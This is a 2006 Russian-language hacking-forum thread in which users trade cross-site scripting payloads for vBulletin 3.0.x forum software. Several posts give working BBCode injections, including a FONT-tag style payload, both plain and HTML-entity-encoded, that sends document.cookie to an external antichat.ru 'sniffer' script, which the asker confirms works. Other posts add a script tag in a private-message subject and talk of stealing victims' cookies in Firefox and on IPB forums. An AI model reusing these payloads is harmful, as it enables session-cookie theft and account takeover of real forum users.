Форумы Есть ли XSS в vBulletin 3.0.8 ?

Discussion in 'Уязвимости CMS/форумов' started by FoGorm, 5 Jan 2006.

  1. FoGorm

    FoGorm Elder - Старейшина

    Joined:
    4 Jan 2006
    Messages:
    54
    Likes Received:
    2
    Reputations:
    -1
    Если какие-нибуль Xss? Пробывал для предыдущих версий (описанных на форуме) ничего не работает. Жду вашим комментариев и советов.
     
    1 person likes this.
  2. sssssssssssq

    sssssssssssq Banned

    Joined:
    8 Aug 2005
    Messages:
    669
    Likes Received:
    426
    Reputations:
    335
    Прочитай статью WJ, может она тебе поможет ))))))))))))))))))))
    http://forum.antichat.ru/thread11807.html
     
  3. FoGorm

    FoGorm Elder - Старейшина

    Joined:
    4 Jan 2006
    Messages:
    54
    Likes Received:
    2
    Reputations:
    -1
    2 Him@s, неа :( Просто выводит вот такой текст:

    [FONT=Arial size=20 style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); / ]wj" target="_blank">http://www.]wj

    А http://www.] стает линком на http://www.]/ и все
     
  4. FoGorm

    FoGorm Elder - Старейшина

    Joined:
    4 Jan 2006
    Messages:
    54
    Likes Received:
    2
    Reputations:
    -1
    Может в твоем HTML коде нужно что-то заменить или убрать? :confused:
     
  5. _-[A.M.D]HiM@S-_

    _-[A.M.D]HiM@S-_ Green member

    Joined:
    28 Dec 2005
    Messages:
    441
    Likes Received:
    454
    Reputations:
    696
  6. FoGorm

    FoGorm Elder - Старейшина

    Joined:
    4 Jan 2006
    Messages:
    54
    Likes Received:
    2
    Reputations:
    -1
    Все или часть? И какую кодировку выбирать? Можешь уже сюда кинуть закодированный код?
     
  7. FoGorm

    FoGorm Elder - Старейшина

    Joined:
    4 Jan 2006
    Messages:
    54
    Likes Received:
    2
    Reputations:
    -1
    ты его проверял? :(
    У меня вот что в сообщение пишет:

    wj" target="_blank">http://www.][FONT=Arial style=d...41; / ]wj

    http://www.] - является ссылкой на http://www.]/

    :((((((

    ЗЫ.. + перед документ.кукис не убрал.. знаю что там он нуже.. и пишет то что я выше написал.
     
  8. FoGorm

    FoGorm Elder - Старейшина

    Joined:
    4 Jan 2006
    Messages:
    54
    Likes Received:
    2
    Reputations:
    -1
    у меня на локалхосте, я там пробую... могу дать ссылку на дистрибутив

    http://vbulletin.net.ru
    Вот здесь скачай 3.0.8
     
    #8 FoGorm, 5 Jan 2006
    Last edited by a moderator: 5 Jan 2006
  9. FoGorm

    FoGorm Elder - Старейшина

    Joined:
    4 Jan 2006
    Messages:
    54
    Likes Received:
    2
    Reputations:
    -1
    что никто так помочь и не сможет? :(
     
  10. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    vBulletin 3.0.3:
    HTML:
    [ EMAIL=[ URL= as=`[email protected]]mailto:[email protected] ]
    sssssssssssssssssssssssssss[/URL][/EMAIL]` style=`background:url(javaSCrip t:alert(/Hi_from_Algol/))`
    
    (без пробела после квадратной скобки)
     
    #10 Algol, 5 Jan 2006
    Last edited: 5 Jan 2006
  11. FoGorm

    FoGorm Elder - Старейшина

    Joined:
    4 Jan 2006
    Messages:
    54
    Likes Received:
    2
    Reputations:
    -1
    Там много квадратных скобок.. убрал после первой, перед Email, и после второй, перед Url, но всеравно не работает :(
     
  12. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Что значит не работает ?? Какой результирующий HTML ?
    В слове javascrp t - перед t - табуляция.
     
  13. 1251soldier

    1251soldier Elder - Старейшина

    Joined:
    13 Oct 2005
    Messages:
    37
    Likes Received:
    14
    Reputations:
    -2
    Vrode tyt esche probel nado ubrat "ew ]" esli ya ne oshibaus.
     
  14. FoGorm

    FoGorm Elder - Старейшина

    Joined:
    4 Jan 2006
    Messages:
    54
    Likes Received:
    2
    Reputations:
    -1
    mailto:[email protected] ]
    sssssssssssssssssssssssssss[/URL]` style=`background:url(javascript:alert(/Hi_from_Algol/))`

    Вот так выводит и все :(
     
  15. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Ну значит не судьба :)
     
  16. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Кстати еще должен быть пассивыный XSS в теме письма:
    Code:
    Тема ПМ<script>alert()</script> 
    Если они это не пофиксили еще...
     
  17. Ricky

    Ricky Banned

    Joined:
    4 Jan 2006
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    Это потому что Алгол дал тебе для версии 3.0.3

    После версии 3.0.6, фильтры очень сильно изменились.

    HTML:
    [URL=wj[url]http://www.][FONT=Arial style=display&+#58;none; style=background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32; / ]wj [/url][/FONT][/URL]
    В атрибутах style, в параметрах, (То что идет после знака равенства) убери плюсики (+).

    Эту строку
    не трогай.

    А вообще пора бы этот код сделать чтобы работал для всех браузеров. Я как приду, напишу тебе чтобы работало не только в ИЕ, но и в Опере и в Фаерфокс.
     
  18. FoGorm

    FoGorm Elder - Старейшина

    Joined:
    4 Jan 2006
    Messages:
    54
    Likes Received:
    2
    Reputations:
    -1
    Отлично... просто класс, все действительно работает! Очень благодарен, спасибо большое!!! Если можешь - напиши чтобы работало и в остальных браузерах, буду ждать! Еще раз огромное спасибо!
     
  19. Horse

    Horse Banned

    Joined:
    6 Jan 2006
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Сделай так, чтобы работало не только в ИЕ, но и в Опера и Фаерфокс. Но так как в ФФ есть авто-защита, то напиши вот так:

    Этот код с паливой, но будет работать и в Фаефокс. Потому что код с паливой, пришлось жертве дать бесчисленное количество алертов. Куки придут на античатовский сниффер, а пока жертва опомнится, у тебя есть несколько секунд делать то, что ты хочешь. В зависимости от знаний твоей жертвы.

    Все параметры тоже закодируй.
     
    #19 Horse, 8 Jan 2006
    Last edited: 8 Jan 2006
  20. Horse

    Horse Banned

    Joined:
    6 Jan 2006
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Кстати, тем кому надо чтобы можно было воровать куки в Фаерфоксе на форумах IPB от 2.* до 2.1.3, то вот вам код:


    Параметры тут тоже закодируйте.

    В версии 2.1.4 теги пост и топик уже пропаченны из-за того, что один человечек на меня настукал компании Инвизион, но как всегда, есть и другие теги, так что не беда. :rolleyes:
     
    #20 Horse, 8 Jan 2006
    Last edited by a moderator: 8 Jan 2006